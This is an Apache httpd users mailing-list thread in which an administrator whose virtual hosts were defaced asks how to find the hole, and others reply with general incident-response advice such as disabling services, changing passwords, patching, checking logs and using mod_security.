might check out mod_security. does not scan but can help prevent in the future. http://www.modsecurity.org/ *********************************************** Tony Guadagno Guadagno Consulting tonyg@xxxxxxxxxxxx 585.703.6700 *********************************************** >>> gosha@xxxxxxxx 4/27/2006 2:31 pm >>> There is about 50 virtual servers, I can't reinstall now, need to find the hole. The changed file has apache.apache ownership, so I think that the hole in web server of php. G. ----- Original Message ----- From: "Sean Conner" <sean@xxxxxxxxxx> To: <users@xxxxxxxxxxxxxxxx> Sent: Thursday, April 27, 2006 8:24 PM Subject: Re: [users@httpd] Security scanners. > It was thus said that the Great Georgy Goshin once stated: >> >> Hello, >> >> A few of virtual hosts on my server was hacked - the content was replaced >> and I can't figure how they did it. Is there any software that will scan >> the >> web server and checks for known security holes? > > I don't know of any software [2] that will do what you ask, but having > been > the recipient of several hacks [1] your server may not have been > compromised > through the webserver---*any* other service running could have been the > vector through which you were compromised (DNS, SQL, SMTP, etc.). Or it > could have been an inside job (the login information to update one of your > sites was compromised). > > Until you figure out how they got in, you have two choices: > > 1. Turn off any services you don't need (you should do this anyway), > change all passwords and disable all CGI scripts until they've > been vetted clean. > > 2. Nuke and pave. Reinstall the server from scratch (I only > recommend this if you have no clue how to proceed or are truely > paranoid) with the latest version you have on CD, then patch > patch patch until *all* the software is to the latest version. > You'll still want to turn off any services you don't need (or > understand) after the install, change the passwords and disable > any CGI scripts until they've been vetted. > > -spc (Been there, done that, don't even have a lousy tee shirt ... ) > > [1] The worst so far being this one: > > http://boston.conman.org/2004/09/13.1 > http://boston.conman.org/2004/09/14.1 > http://boston.conman.org/2004/09/19.1 > > There have been others though: > > http://boston.conman.org/2005/10/05.2 > > [2] Actually, I do know of some, but they're the software programs that > are currently trying to break in through an insecure webserver or > CGI scripts. You can check your web logfiles and see plenty of > those happening. If any of those requests are 200, then there's a > hole. > > > --------------------------------------------------------------------- > The official User-To-User support forum of the Apache HTTP Server Project. > See <URL:http://httpd.apache.org/userslist.html> for more info. > To unsubscribe, e-mail: users-unsubscribe@xxxxxxxxxxxxxxxx > " from the digest: users-digest-unsubscribe@xxxxxxxxxxxxxxxx > For additional commands, e-mail: users-help@xxxxxxxxxxxxxxxx > > --------------------------------------------------------------------- The official User-To-User support forum of the Apache HTTP Server Project. See <URL:http://httpd.apache.org/userslist.html> for more info. To unsubscribe, e-mail: users-unsubscribe@xxxxxxxxxxxxxxxx " from the digest: users-digest-unsubscribe@xxxxxxxxxxxxxxxx For additional commands, e-mail: users-help@xxxxxxxxxxxxxxxx
BEGIN:VCARD VERSION:2.1 X-GWTYPE:USER FN:Tony Guadagno EMAIL;WORK;PREF;NGW:tonyg@xxxxxxxxxxxx N:Guadagno;Tony END:VCARD
--------------------------------------------------------------------- The official User-To-User support forum of the Apache HTTP Server Project. See <URL:http://httpd.apache.org/userslist.html> for more info. To unsubscribe, e-mail: users-unsubscribe@xxxxxxxxxxxxxxxx " from the digest: users-digest-unsubscribe@xxxxxxxxxxxxxxxx For additional commands, e-mail: users-help@xxxxxxxxxxxxxxxx
|